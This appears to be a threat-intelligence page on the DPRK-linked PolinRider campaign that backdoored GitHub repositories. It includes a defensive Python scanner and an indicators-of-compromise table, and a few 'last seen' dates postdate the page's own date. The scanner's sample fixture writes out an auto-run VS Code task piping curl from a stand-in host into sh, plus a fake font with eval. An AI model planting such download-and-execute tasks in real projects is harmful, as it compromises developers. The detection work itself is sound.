PolinRider: DPRK Threat Actor Implants Malware in Hundreds of GitHub Repos
2026-04-11 • OSM
OpenSourceMalware attributes PolinRider to a DPRK-linked actor connected to Lazarus activity, Contagious Interview, and TasksJacker, with confirmed infections across 1,951 public GitHub repositories and 1,047 owners as of April 11, 2026. The campaign appended obfuscated JavaScript to legitimate project configuration files and then expanded into several delivery vectors: .vscode/tasks.json tasks that pipe a curl download straight into a shell, malicious npm dependencies, JavaScript payloads disguised as .woff2 font files, and propagation scripts that amended existing Git commits and force-pushed them while preserving the prior author and date metadata, so the tampering does not show up as a new commit in the history.

The report ties the activity to developer supply-chain compromise through infected open-source projects, weaponized take-home tests such as ShoeVista and StakingGame, and Vercel-hosted C2 subdomains including default-configuration.vercel.app. The scale and the evidence of repeated reinfection show an active operation against developers and their downstream users rather than isolated repository defacement.
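The vectors listed above can be checked for mechanically in a cloned repository. The following scanner is an added example written for this page, not tooling from the OSM report: it flags curl-to-shell commands in .vscode/tasks.json (and whether the task is set to run automatically on folder open), .woff2 files whose bytes are not a WOFF 2.0 font (genuine fonts start with the magic `wOF2`), long single lines of eval/Function/hex-escape JavaScript appended to config files, and package.json dependencies or install hooks that pull code from a URL. The sample repository it builds in a temporary directory, including the hostname example.invalid and the dependency name helper-lib, is constructed for the demonstration and does not reproduce any real PolinRider artifact.

```python
"""Heuristic scanner for PolinRider-style repository tampering.
Example code for this page, not the OSM report's own tooling. The sample
repository below is constructed in a temp dir purely for demonstration."""
import json
import re
import tempfile
from pathlib import Path

WOFF2_MAGIC = b"wOF2"  # first four bytes of a genuine WOFF 2.0 font

# curl/wget output piped straight into an interpreter
CURL_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sh|bash|zsh|node|python3?)\b")

# markers of string-assembled, runtime-evaluated JavaScript
OBFUSCATION_RE = re.compile(
    r"(?:\\x[0-9a-fA-F]{2}){8,}|\beval\s*\(|new\s+Function\s*\(|String\.fromCharCode\s*\("
)
CODE_SUFFIXES = {".js", ".cjs", ".mjs"}


def looks_obfuscated(text: str, min_line: int = 200) -> bool:
    """True if some long single line carries eval/Function/hex-escape payloads."""
    return any(len(l) >= min_line and OBFUSCATION_RE.search(l) for l in text.splitlines())


def scan_tasks_json(path: Path) -> list:
    """Flag VS Code tasks that download-and-execute; note runOn=folderOpen auto-start."""
    findings = []
    text = path.read_text(encoding="utf-8", errors="replace")
    try:
        tasks = json.loads(text).get("tasks", [])
    except (json.JSONDecodeError, AttributeError):
        tasks = []  # JSONC with comments: fall back to the raw-text match below
    for t in tasks:
        cmd = " ".join([str(t.get("command", ""))] + [str(a) for a in t.get("args", [])])
        if CURL_TO_SHELL.search(cmd):
            findings.append({"file": str(path), "type": "tasks_curl_to_shell", "label": t.get("label"),
                             "auto_run": (t.get("runOptions") or {}).get("runOn") == "folderOpen"})
    if not tasks and CURL_TO_SHELL.search(text):
        findings.append({"file": str(path), "type": "tasks_curl_to_shell", "label": None, "auto_run": None})
    return findings


def scan_package_json(path: Path) -> list:
    """Flag dependencies not resolved from the registry and install hooks that fetch code."""
    findings = []
    try:
        pkg = json.loads(path.read_text(encoding="utf-8"))
    except json.JSONDecodeError:
        return findings
    for field in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in (pkg.get(field) or {}).items():
            if re.match(r"(?:https?:|git\+|github:|file:)", str(spec)):
                findings.append({"file": str(path), "type": "non_registry_dependency", "dep": name})
    for hook in ("preinstall", "install", "postinstall", "prepare"):
        if CURL_TO_SHELL.search(str((pkg.get("scripts") or {}).get(hook, ""))):
            findings.append({"file": str(path), "type": "install_hook_curl_to_shell", "hook": hook})
    return findings


def scan_repo(root: Path) -> list:
    """Walk a checkout and collect findings for all four vectors."""
    findings = []
    for p in root.rglob("*"):
        if not p.is_file() or "node_modules" in p.parts or ".git" in p.parts:
            continue
        rel = p.relative_to(root).as_posix()
        if rel == ".vscode/tasks.json":
            findings += scan_tasks_json(p)
        elif p.name == "package.json":
            findings += scan_package_json(p)
        elif p.suffix == ".woff2" and p.read_bytes()[:4] != WOFF2_MAGIC:
            findings.append({"file": str(p), "type": "fake_woff2"})
        elif p.suffix in CODE_SUFFIXES and looks_obfuscated(p.read_text(encoding="utf-8", errors="replace")):
            findings.append({"file": str(p), "type": "obfuscated_js_appended"})
    return findings


def build_sample_repo() -> Path:
    """Constructed sample (hypothetical names/hosts): one real font, one fake font,
    a tampered webpack config, an auto-run curl-to-shell task, a URL dependency."""
    root = Path(tempfile.mkdtemp())
    (root / ".vscode").mkdir()
    (root / ".vscode" / "tasks.json").write_text(json.dumps({"version": "2.0.0", "tasks": [
        {"label": "setup", "type": "shell",
         "command": "curl -s https://example.invalid/setup.sh | sh",
         "runOptions": {"runOn": "folderOpen"}}]}))
    (root / "fonts").mkdir()
    (root / "fonts" / "real.woff2").write_bytes(WOFF2_MAGIC + b"\x00" * 64)
    (root / "fonts" / "site.woff2").write_bytes(b"var _0x1=['x'];eval(_0x1[0]);")
    hex_blob = "".join(f"\\x{b:02x}" for b in b"console.log(1);" * 20)  # harmless hex-escaped JS
    (root / "webpack.config.js").write_text(
        "module.exports = { mode: 'production' };\n" + f'(function(){{eval("{hex_blob}")}})();\n')
    (root / "package.json").write_text(json.dumps({"name": "demo", "scripts": {"build": "webpack"},
        "dependencies": {"left-pad": "^1.3.0", "helper-lib": "https://example.invalid/helper.tgz"}}))
    return root


if __name__ == "__main__":
    for finding in scan_repo(build_sample_repo()):
        print(finding)
```

Run against a real checkout with `scan_repo(Path("path/to/clone"))`. The heuristics are deliberately narrow so they stay quiet on ordinary projects; the magic-byte check on .woff2 files is the cheapest and most reliable of the four, since no bundler produces a font file that starts with ASCII JavaScript.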
Indicators of Compromise

Several of the domains below (api.trongrid.io, fullnode.mainnet.aptoslabs.com, bsc-dataseed.binance.org, bsc-rpc.publicnode.com, onrender.com, github.io) are shared public infrastructure, namely blockchain RPC endpoints and hosting platforms, so blocking them outright will break legitimate traffic. Match on the full URL entries and pair the domains with the YARA rules and host-based indicators rather than treating a bare DNS hit as a confirmed infection. Truncated URL values are reproduced as published.
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | api.trongrid.io | 2025-10-27 | 2026-05-31 |
| DOMAIN | fullnode.mainnet.aptoslabs.com | 2025-10-27 | 2026-05-31 |
| DOMAIN | onrender.com | 2024-08-23 | 2026-04-12 |
| YARA | rmcej_otb_payload | 2026-04-11 | 2026-04-11 |
| YARA | polinrider_payload | 2026-04-11 | 2026-04-11 |
| URL | https://fullnode.mainnet.aptosl… | 2026-03-08 | 2026-04-11 |
| URL | https://wolf-studios-frontend.v… | 2026-03-08 | 2026-04-11 |
| URL | https://api.trongrid.io/v1/acco… | 2026-03-08 | 2026-04-11 |
| DOMAIN | gowreesh-vt.github.io | 2026-03-08 | 2026-04-11 |
| DOMAIN | shop.ceenami.com | 2026-03-08 | 2026-04-11 |
| URL | https://api.trongrid.io/v1/acco… | 2026-01-14 | 2026-04-11 |
| URL | https://fullnode.mainnet.aptosl… | 2026-01-14 | 2026-04-11 |
| DOMAIN | bsc-dataseed.binance.org | 2025-10-27 | 2026-04-11 |
| DOMAIN | bsc-rpc.publicnode.com | 2025-10-27 | 2026-04-11 |